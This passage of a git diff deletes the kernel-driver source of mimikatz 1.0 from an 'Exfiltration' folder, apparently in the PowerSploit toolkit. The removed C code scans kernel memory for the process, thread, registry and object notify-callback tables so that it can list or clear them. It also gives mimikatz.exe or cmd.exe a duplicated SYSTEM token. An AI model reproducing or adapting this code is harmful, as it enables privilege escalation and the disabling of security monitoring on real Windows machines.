NULL; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" -> NULL !\n"); - } - } - } - } - } - } - } - } - } - } - return status; -} - -NTSTATUS getObpTypeDirectoryObject() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - #ifdef _M_X64 - UCHAR PTRN_WALL_Object[] = {0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84}; - LONG OFFS_WNT5_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 8 + 8 + 8 + 3; - LONG OFFS_WNO8_Object = sizeof(PTRN_WALL_Object) + 4 + 3 + 2 + 3; - LONG OFFS_WIN8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 3; - #elif defined _M_IX86 - UCHAR PTRN_WALL_Object[] = {0x5c, 0x0f, 0x84}; - LONG OFFS_WNT5_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 2; - LONG OFFS_WNO8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 1; - LONG OFFS_WIN8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 2; - #endif - - PUCHAR refDebut = NULL, refFin = NULL; LONG offsetTo = 0; - UNICODE_STRING maRoutine; - - if(ObpTypeDirectoryObject) - { - retour = STATUS_SUCCESS; - } - else - { - RtlInitUnicodeString(&maRoutine, L"ObCreateObjectType"); - if(refDebut = (PUCHAR) MmGetSystemRoutineAddress(&maRoutine)) - { - refFin = refDebut + PAGE_SIZE; - - if(INDEX_OS < INDEX_8) - { - if(INDEX_OS < INDEX_VISTA) - offsetTo = OFFS_WNT5_Object; - else - { - offsetTo = OFFS_WNO8_Object; - #ifdef _M_X64 - refFin = refDebut - PAGE_SIZE; - #endif - } - } - else - offsetTo = OFFS_WIN8_Object; - - retour = genericPointerSearch((PUCHAR *) &ObpTypeDirectoryObject, refDebut, refFin, PTRN_WALL_Object, sizeof(PTRN_WALL_Object), offsetTo); - } - } - return retour; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/notify_object.h b/Exfiltration/mimikatz-1.0/driver/notify_object.h deleted file mode 100644 index 96d5517..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_object.h +++ /dev/null @@ -1,79 +0,0 @@ -#pragma once -#include "notify.h" - -#define OBJECT_HASH_TABLE_SIZE 37 - -typedef struct _OBJECT_DIRECTORY_ENTRY { - struct _OBJECT_DIRECTORY_ENTRY *NextEntry; - PVOID Object; - ULONG HashValue; // pas en NT5 -} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; - -typedef struct _OBJECT_DIRECTORY { - POBJECT_DIRECTORY_ENTRY HashBuckets[OBJECT_HASH_TABLE_SIZE]; - EX_PUSH_LOCK Lock; - PVOID DeviceMap; - ULONG SessionId; - PVOID NamespaceEntry; // a partir de l, diffrent en NT5, mais pas utilis... - ULONG Flags; -} OBJECT_DIRECTORY, *POBJECT_DIRECTORY; - -typedef struct _OBJECT_TYPE_INITIALIZER // NT6, dcaler ULONG en NT5x86 (compens par l'alignement en x64) -{ - SHORT Length; - UCHAR ObjectTypeFlags; - ULONG ObjectTypeCode; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ACCESS_MASK ValidAccessMask; - ULONG RetainAccess; - POOL_TYPE PoolType; - ULONG DefaultPagedPoolCharge; - ULONG DefaultNonPagedPoolCharge; - PVOID DumpProcedure; - PVOID OpenProcedure; - PVOID CloseProcedure; - PVOID DeleteProcedure; - PVOID ParseProcedure; - PVOID SecurityProcedure; - PVOID QueryNameProcedure; - PVOID OkayToCloseProcedure; -} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; - -typedef struct _OBJECT_TYPE { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER TypeInfo; - EX_PUSH_LOCK TypeLock; - ULONG Key; - LIST_ENTRY CallbackList; -} OBJECT_TYPE, *POBJECT_TYPE; - -typedef struct _OBJECT_CALLBACK_ENTRY { - LIST_ENTRY CallbackList; - OB_OPERATION Operations; - ULONG Active; - /*OB_HANDLE*/ PVOID Handle; - POBJECT_TYPE ObjectType; - POB_PRE_OPERATION_CALLBACK PreOperation; - POB_POST_OPERATION_CALLBACK PostOperation; -} OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY; - -typedef enum _KIWI_NOTIF_OBJECT_ACTION -{ - ListNotif, - ClearNotif -} KIWI_NOTIF_OBJECT_ACTION; - -POBJECT_DIRECTORY * ObpTypeDirectoryObject; - -NTSTATUS getObpTypeDirectoryObject(); -NTSTATUS kListNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); -NTSTATUS kClearNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); -NTSTATUS listNotifyOrClearObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_NOTIF_OBJECT_ACTION action); diff --git a/Exfiltration/mimikatz-1.0/driver/notify_process.c b/Exfiltration/mimikatz-1.0/driver/notify_process.c deleted file mode 100644 index 87cc3ed..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_process.c +++ /dev/null @@ -1,137 +0,0 @@ -#include "notify_process.h" - -ULONG * PspCreateProcessNotifyRoutineCount = NULL; -ULONG * PspCreateProcessNotifyRoutineExCount = NULL; -PVOID * PspCreateProcessNotifyRoutine = NULL; - -NTSTATUS kListNotifyProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - ULONG i; - PKIWI_CALLBACK monCallBack; - ULONG bonusCount; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyProcesses\n\n"); - if(NT_SUCCESS(status)) - { - status = getPspCreateProcessNotifyRoutine(); - if(NT_SUCCESS(status)) - { - bonusCount = *PspCreateProcessNotifyRoutineCount + ((INDEX_OS < INDEX_VISTA) ? 0 : *PspCreateProcessNotifyRoutineExCount); - for(i = 0; (i < bonusCount) && NT_SUCCESS(status) ; i++) - { - monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspCreateProcessNotifyRoutine[i]); - if(monCallBack != NULL) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - } - } - } - return status; -} - -NTSTATUS getPspCreateProcessNotifyRoutine() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - #ifdef _M_X64 - UCHAR PTRN_WNT5_Process[] = {0x41, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xeb}; - LONG OFFS_WNT5_Process = -4; - UCHAR PTRN_WNO8_Process[] = {0x40, 0xc0, 0xed, 0x02, 0x41, 0x22, 0xee, 0xa8, 0x02, 0x0f, 0x84}; - LONG OFFS_WNO8_Process = sizeof(PTRN_WNO8_Process) + 4 + 3; - UCHAR PTRN_WIN8_Process[] = {0x40, 0xc0, 0xee, 0x02, 0x41, 0x22, 0xf6, 0xa8, 0x02, 0x0f, 0x84}; - LONG OFFS_WIN8_Process = sizeof(PTRN_WIN8_Process) + 4 + 3; - - PUCHAR REF_D_WNO8_Process = (PUCHAR) CcMdlRead; - PUCHAR REF_F_WNO8_Process = REF_D_WNO8_Process - 25*PAGE_SIZE; - PUCHAR REF_D_WIN8_Process = (PUCHAR) SeImpersonateClientEx; - PUCHAR REF_F_WIN8_Process = REF_D_WIN8_Process + 25*PAGE_SIZE; - - LONG OFFS_WNO8_CountEx = sizeof(PVOID) * MAX_NT6_PspCreateProcessNotifyRoutine; - LONG OFFS_WIN8_CountEx = OFFS_WNO8_CountEx; - LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine; - LONG OFFS_WNO8_Count = OFFS_WNO8_CountEx + sizeof(ULONG); - LONG OFFS_WIN8_Count = - 0x18; - #elif defined _M_IX86 - UCHAR PTRN_WNT5_Process[] = {0x56, 0x57, 0x74}; - LONG OFFS_WNT5_Process = sizeof(PTRN_WNT5_Process) + 2; - UCHAR PTRN_WNO8_Process[] = {0x33, 0xdb, 0xc7, 0x45}; - LONG OFFS_WNO8_Process = sizeof(PTRN_WNO8_Process) + 1; - UCHAR PTRN_WIN8_Process[] = {0x33, 0xdb, 0x89, 0x5d, 0x0c, 0xbe}; - LONG OFFS_WIN8_Process = sizeof(PTRN_WIN8_Process); - - PUCHAR REF_D_WNO8_Process = (PUCHAR) PsSetCreateProcessNotifyRoutine; - PUCHAR REF_F_WNO8_Process = REF_D_WNO8_Process + 25*PAGE_SIZE; - PUCHAR REF_D_WIN8_Process = (PUCHAR) IoConnectInterrupt; - PUCHAR REF_F_WIN8_Process = REF_D_WIN8_Process - 25*PAGE_SIZE; - - LONG OFFS_WNO8_CountEx = sizeof(PVOID) * MAX_NT6_PspCreateProcessNotifyRoutine; - LONG OFFS_WIN8_CountEx = - 0x20; - LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine; - LONG OFFS_WNO8_Count = OFFS_WNO8_CountEx + sizeof(ULONG); - LONG OFFS_WIN8_Count = OFFS_WIN8_CountEx - sizeof(ULONG); - #endif - - PUCHAR pointeur = NULL, pattern = NULL, refDebut = NULL, refFin = NULL; SIZE_T taille = 0; LONG offsetTo = 0; - LONG offsetToCountEx = 0, offsetToCount = 0; - - if(PspCreateProcessNotifyRoutine && ((INDEX_OS < INDEX_VISTA) || PspCreateProcessNotifyRoutineExCount) && PspCreateProcessNotifyRoutineCount) - { - retour = STATUS_SUCCESS; - } - else - { - if(INDEX_OS < INDEX_8) - { - if(INDEX_OS < INDEX_VISTA) - { - pattern = PTRN_WNT5_Process; - taille = sizeof(PTRN_WNT5_Process); - offsetTo = OFFS_WNT5_Process; - offsetToCount = OFFS_WNT5_Count; - } - else - { - pattern = PTRN_WNO8_Process; - taille = sizeof(PTRN_WNO8_Process); - offsetTo = OFFS_WNO8_Process; - offsetToCountEx = OFFS_WNO8_CountEx; - offsetToCount = OFFS_WNO8_Count; - } - refDebut = REF_D_WNO8_Process; - refFin = REF_F_WNO8_Process; - } - else - { - pattern = PTRN_WIN8_Process; - taille = sizeof(PTRN_WIN8_Process); - offsetTo = OFFS_WIN8_Process; - refDebut = REF_D_WIN8_Process; - refFin = REF_F_WIN8_Process; - offsetToCountEx = OFFS_WIN8_CountEx; - offsetToCount = OFFS_WIN8_Count; - } - - retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo); - if(NT_SUCCESS(retour)) - { - PspCreateProcessNotifyRoutine = (PVOID) (pointeur); - PspCreateProcessNotifyRoutineCount = (PULONG) (pointeur + offsetToCount); - if(INDEX_OS >= INDEX_VISTA) - PspCreateProcessNotifyRoutineExCount = (PULONG) (pointeur + offsetToCountEx); - - if(PspCreateProcessNotifyRoutine && ((INDEX_OS < INDEX_VISTA) || PspCreateProcessNotifyRoutineExCount) && PspCreateProcessNotifyRoutineCount) - retour = STATUS_SUCCESS; - } - } - return retour; -} diff --git a/Exfiltration/mimikatz-1.0/driver/notify_process.h b/Exfiltration/mimikatz-1.0/driver/notify_process.h deleted file mode 100644 index 27cbe3a..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_process.h +++ /dev/null @@ -1,12 +0,0 @@ -#pragma once -#include "notify.h" - -#define MAX_NT6_PspCreateProcessNotifyRoutine 64 -#define MAX_NT5_PspCreateProcessNotifyRoutine 8 - -ULONG * PspCreateProcessNotifyRoutineCount; -ULONG * PspCreateProcessNotifyRoutineExCount; -PVOID * PspCreateProcessNotifyRoutine; - -NTSTATUS getPspCreateProcessNotifyRoutine(); -NTSTATUS kListNotifyProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); diff --git a/Exfiltration/mimikatz-1.0/driver/notify_reg.c b/Exfiltration/mimikatz-1.0/driver/notify_reg.c deleted file mode 100644 index 843cfba..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_reg.c +++ /dev/null @@ -1,137 +0,0 @@ -#include "notify_reg.h" - -ULONG * CmpCallBackCount = NULL; -PVOID * CmpCallBackVector = NULL; -PLIST_ENTRY CallbackListHead = NULL; - -NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - ULONG i; - PKIWI_CALLBACK monCallBack; - PLIST_ENTRY maListe; - PKIWI_REGISTRY6_CALLBACK monCallBack6; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyRegistry\n\n"); - if(NT_SUCCESS(status)) - { - status = getNotifyRegistryRoutine(); - if(NT_SUCCESS(status)) - { - if(INDEX_OS < INDEX_VISTA) - { - for(i = 0; (i < *CmpCallBackCount) && NT_SUCCESS(status) ; i++) - { - monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(CmpCallBackVector[i]); - if(monCallBack != NULL) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L" - cookie %#.I64x\n", *(monCallBack->opt_cookie) - ); - } - } - } - } - } - else - { - for(maListe = CallbackListHead->Flink, i = 0; (maListe != CallbackListHead) && NT_SUCCESS(status) ; maListe = maListe->Flink, i++) - { - monCallBack6 = (PKIWI_REGISTRY6_CALLBACK) (((ULONG_PTR) maListe) + sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG))); - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) monCallBack6->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L" - alt %wZ - cookie %#.I64x\n", &(monCallBack6->altitude), monCallBack6->cookie); - } - } - } - } - } - } - return status; -} - -NTSTATUS getNotifyRegistryRoutine() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - #ifdef _M_X64 - UCHAR PTRN_WNT5_Vector[]= {0x4c, 0x8d, 0x3d}; - UCHAR PTRN_WNT5_Count[] = {0x0f, 0xc1, 0x05}; - - UCHAR PTRN_WN60_Head[] = {0x48, 0x8b, 0xf0, 0x48}; - LONG OFFS_WN60_Head = -9; - UCHAR PTRN_WALL_Head[] = {0x48, 0x8b, 0xf8, 0x48}; - LONG OFFS_WALL_Head = -9; - #elif defined _M_IX86 - UCHAR PTRN_WNT5_Vector[]= {0x53, 0x56, 0x57, 0xbb}; - UCHAR PTRN_WNT5_Count[] = {0xff, 0xb9}; - - UCHAR PTRN_WN60_Head[] = {0x8b, 0xcb, 0xe8}; - LONG OFFS_WN60_Head = 12; - UCHAR PTRN_WN61_Head[] = {0x8b, 0xc7, 0xe8}; - LONG OFFS_WN61_Head = -4; - UCHAR PTRN_WIN8_Head[] = {0x53, 0x8d, 0x55}; - LONG OFFS_WIN8_Head = -4; - #endif - PUCHAR refDebut = (PUCHAR) CmUnRegisterCallback, refFin = refDebut + PAGE_SIZE; - PUCHAR pattern = NULL; SIZE_T taille = 0; LONG offsetTo = 0; - - if((CmpCallBackVector && CmpCallBackCount) || CallbackListHead) - { - retour = STATUS_SUCCESS; - } - else - { - if(INDEX_OS < INDEX_VISTA) - { - retour = genericPointerSearch((PUCHAR *) &CmpCallBackVector, refDebut, refFin, PTRN_WNT5_Vector, sizeof(PTRN_WNT5_Vector), sizeof(PTRN_WNT5_Vector)); - if(NT_SUCCESS(retour)) - { - retour = genericPointerSearch((PUCHAR *) &CmpCallBackCount, refDebut, refFin, PTRN_WNT5_Count, sizeof(PTRN_WNT5_Count), sizeof(PTRN_WNT5_Count)); - } - } - else - { - if(INDEX_OS < INDEX_7) - { - pattern = PTRN_WN60_Head; - taille = sizeof(PTRN_WN60_Head); - offsetTo= OFFS_WN60_Head; - } - else - { - #ifdef _M_X64 - pattern = PTRN_WALL_Head; - taille = sizeof(PTRN_WALL_Head); - offsetTo= OFFS_WALL_Head; - #elif defined _M_IX86 - if(INDEX_OS < INDEX_8) - { - pattern = PTRN_WN61_Head; - taille = sizeof(PTRN_WN61_Head); - offsetTo= OFFS_WN61_Head; - } - else - { - pattern = PTRN_WIN8_Head; - taille = sizeof(PTRN_WIN8_Head); - offsetTo= OFFS_WIN8_Head; - } - #endif - } - retour = genericPointerSearch((PUCHAR *) &CallbackListHead, refDebut, refFin, pattern, taille, offsetTo); - } - } - return retour; -} diff --git a/Exfiltration/mimikatz-1.0/driver/notify_reg.h b/Exfiltration/mimikatz-1.0/driver/notify_reg.h deleted file mode 100644 index ce86568..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_reg.h +++ /dev/null @@ -1,17 +0,0 @@ -#pragma once -#include "notify.h" - -ULONG * CmpCallBackCount; -PVOID * CmpCallBackVector; -PLIST_ENTRY CallbackListHead; - -typedef struct _KIWI_REGISTRY6_CALLBACK -{ - LARGE_INTEGER cookie; - PVOID context; - PVOID callback; - UNICODE_STRING altitude; -} KIWI_REGISTRY6_CALLBACK, *PKIWI_REGISTRY6_CALLBACK; - -NTSTATUS getNotifyRegistryRoutine(); -NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); diff --git a/Exfiltration/mimikatz-1.0/driver/notify_thread.c b/Exfiltration/mimikatz-1.0/driver/notify_thread.c deleted file mode 100644 index 41436b0..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_thread.c +++ /dev/null @@ -1,111 +0,0 @@ -#include "notify_thread.h" - -ULONG * PspCreateThreadNotifyRoutineCount = NULL; -PVOID * PspCreateThreadNotifyRoutine = NULL; - -NTSTATUS kListNotifyThreads(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - ULONG i; - PKIWI_CALLBACK monCallBack; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyThreads\n\n"); - if(NT_SUCCESS(status)) - { - status = getPspCreateThreadNotifyRoutine(); - if(NT_SUCCESS(status)) - { - for(i = 0; (i < *PspCreateThreadNotifyRoutineCount) && NT_SUCCESS(status) ; i++) - { - monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspCreateThreadNotifyRoutine[i]); - if(monCallBack != NULL) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - } - } - } - return status; -} - -NTSTATUS getPspCreateThreadNotifyRoutine() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - #ifdef _M_X64 - UCHAR PTRN_WNT5_Thread[] = {0x48, 0x8d, 0x35}; - LONG OFFS_WNT5_Thread = sizeof(PTRN_WNT5_Thread); - UCHAR PTRN_WNT6_Thread[] = {0x48, 0x8d, 0x0d}; - LONG OFFS_WNT6_Thread = sizeof(PTRN_WNT6_Thread); - #elif defined _M_IX86 - UCHAR PTRN_WNO8_Thread[] = {0x56, 0xbe}; - LONG OFFS_WNO8_Thread = sizeof(PTRN_WNO8_Thread); - UCHAR PTRN_WIN8_Thread[] = {0x53, 0xbb}; - LONG OFFS_WIN8_Thread = sizeof(PTRN_WIN8_Thread); - #endif - LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine; - LONG OFFS_WNT6_Count = sizeof(PVOID) * MAX_NT6_PspCreateThreadNotifyRoutine; - - PUCHAR pointeur = NULL, pattern = NULL, refDebut = (PUCHAR) PsSetCreateThreadNotifyRoutine, refFin = refDebut + PAGE_SIZE; SIZE_T taille = 0; LONG offsetTo = 0; - LONG offsetToCount = 0; - - if(PspCreateThreadNotifyRoutine && PspCreateThreadNotifyRoutineCount) - { - retour = STATUS_SUCCESS; - } - else - { - if(INDEX_OS < INDEX_VISTA) - { - #ifdef _M_X64 - pattern = PTRN_WNT5_Thread; - taille = sizeof(PTRN_WNT5_Thread); - offsetTo = OFFS_WNT5_Thread; - #endif - offsetToCount = OFFS_WNT5_Count; - } - else - { - #ifdef _M_X64 - pattern = PTRN_WNT6_Thread; - taille = sizeof(PTRN_WNT6_Thread); - offsetTo = OFFS_WNT6_Thread; - #endif - offsetToCount = OFFS_WNT6_Count; - } - - #if defined _M_IX86 - if(INDEX_OS < INDEX_8) - { - pattern = PTRN_WNO8_Thread; - taille = sizeof(PTRN_WNO8_Thread); - offsetTo = OFFS_WNO8_Thread; - } - else - { - pattern = PTRN_WIN8_Thread; - taille = sizeof(PTRN_WIN8_Thread); - offsetTo = OFFS_WIN8_Thread; - } - #endif - - retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo); - if(NT_SUCCESS(retour)) - { - PspCreateThreadNotifyRoutine = (PVOID) (pointeur); - PspCreateThreadNotifyRoutineCount = (PULONG) (pointeur + offsetToCount); - - if(PspCreateThreadNotifyRoutine && PspCreateThreadNotifyRoutineCount) - retour = STATUS_SUCCESS; - } - } - return retour; -} diff --git a/Exfiltration/mimikatz-1.0/driver/notify_thread.h b/Exfiltration/mimikatz-1.0/driver/notify_thread.h deleted file mode 100644 index 22499b7..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_thread.h +++ /dev/null @@ -1,11 +0,0 @@ -#pragma once -#include "notify.h" - -#define MAX_NT6_PspCreateThreadNotifyRoutine 64 -#define MAX_NT5_PspCreateThreadNotifyRoutine 8 - -ULONG * PspCreateThreadNotifyRoutineCount; -PVOID * PspCreateThreadNotifyRoutine; - -NTSTATUS getPspCreateThreadNotifyRoutine(); -NTSTATUS kListNotifyThreads(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); diff --git a/Exfiltration/mimikatz-1.0/driver/processes.c b/Exfiltration/mimikatz-1.0/driver/processes.c deleted file mode 100644 index 55e13ab..0000000 --- a/Exfiltration/mimikatz-1.0/driver/processes.c +++ /dev/null @@ -1,146 +0,0 @@ -#include "processes.h" - -const ULONG EPROCESS_OffSetTable[MAX_OS_LEN][MAX_EPROCESS_LEN] = -{ - /* INDEX_EPROCESS_NEXT, INDEX_EPROCESS_FLAGS2, INDEX_TOKEN_PRIVS */ -#ifdef _M_IX86 -/* INDEX_UNK */ {0x0000, 0x0000, 0x0000}, -/* INDEX_XP */ {0x0088, 0x0000, 0x0000}, -/* INDEX_2K3 */ {0x0098, 0x0000, 0x0000}, -/* INDEX_VISTA */ {0x00a0, 0x0224, 0x0040}, -/* INDEX_2K8 */ {0x00a0, 0x0224, 0x0040}, -/* INDEX_7 */ {0x00b8, 0x026c, 0x0040}, -/* INDEX_2K8R2 */ {0x0000, 0x0000, 0x0000},/* n'existe pas ! */ -/* INDEX_8 */ {0x00b8, 0x00c0, 0x0040} -#else -/* INDEX_UNK */ {0x0000, 0x0000, 0x0000}, -/* INDEX_XP */ {0x0000, 0x0000, 0x0000},/* n'existe pas, XP x64 *est* 2003 x64 */ -/* INDEX_2K3 */ {0x00e0, 0x0000, 0x0000}, -/* INDEX_VISTA */ {0x00e8, 0x036c, 0x0040}, -/* INDEX_2K8 */ {0x00e8, 0x036c, 0x0040}, -/* INDEX_7 */ {0x0188, 0x043c, 0x0040}, -/* INDEX_2K8R2 */ {0x0188, 0x043c, 0x0040}, -/* INDEX_8 */ {0x02e8, 0x02f8, 0x0040} -#endif -}; - -NTSTATUS sysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - return listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, ExchangeToken); -} - -NTSTATUS listProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - return listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, ListProcesses); -} - -NTSTATUS privProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status = STATUS_NOT_SUPPORTED; - - if(INDEX_OS >= INDEX_VISTA) - status = listProcessesOrSysToken(pszDest, cbDest, ppszDestEnd, pcbRemaining, FullPrivilegeNT6); - - return status; -} - -NTSTATUS listProcessesOrSysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_EPROCESS_ACTION action) -{ - NTSTATUS status = STATUS_SUCCESS, status2 = STATUS_SUCCESS; - PEPROCESS monProcess = NULL; - PCHAR processName = NULL; - HANDLE processId = NULL; - - PACCESS_TOKEN monTokenAcess = NULL; - PKIWI_NT6_PRIVILEGES mesPrivileges = NULL; - - HANDLE sysProcessHandle, sysProcessTokenHandle, newSysTokenHandle, processHandle; - PROCESS_ACCESS_TOKEN ProcessTokenInformation; - PULONG pFlags2 = NULL; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - - for( - monProcess = PsInitialSystemProcess; - NT_SUCCESS(status) && - (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]))- EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]) != PsInitialSystemProcess; - monProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]))- EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_NEXT]) - ) - { - processName = PsGetProcessImageFileName(monProcess); - processId = PsGetProcessId(monProcess); - - if(action == ExchangeToken || action == FullPrivilegeNT6) - { - if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) || (RtlCompareMemory("cmd.exe", processName, 7) == 7)) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L"processes::ExchangeToken/FullPrivilegeNT6 \'%S' trouv :) - PID %u\n", processName, processId - ); - if(action == ExchangeToken) - { - status2 = ObOpenObjectByPointer(PsInitialSystemProcess, OBJ_KERNEL_HANDLE, NULL, GENERIC_READ, *PsProcessType, KernelMode, &sysProcessHandle); - if(NT_SUCCESS(status2)) - { - status2 = ObOpenObjectByPointer(monProcess, OBJ_KERNEL_HANDLE, NULL, GENERIC_WRITE, *PsProcessType, KernelMode, &processHandle); - if(NT_SUCCESS(status2)) - { - status2 = ZwOpenProcessTokenEx(sysProcessHandle, TOKEN_DUPLICATE, OBJ_KERNEL_HANDLE, &sysProcessTokenHandle); - if(NT_SUCCESS(status2)) - { - status2 = ZwDuplicateToken(sysProcessTokenHandle, TOKEN_ASSIGN_PRIMARY, NULL, FALSE, TokenPrimary, &newSysTokenHandle); - if(NT_SUCCESS(status2)) - { - ProcessTokenInformation.Token = newSysTokenHandle; - ProcessTokenInformation.Thread = 0; - - if(INDEX_OS >= INDEX_VISTA) - { - pFlags2 = (PULONG) (((ULONG_PTR) monProcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_EPROCESS_FLAGS2]); - *pFlags2 &= ~TOKEN_FROZEN_MASK; - } - - status2 = ZwSetInformationProcess(processHandle, ProcessAccessToken, &ProcessTokenInformation, sizeof(PROCESS_ACCESS_TOKEN)); - if(NT_SUCCESS(status2)) - { - status = 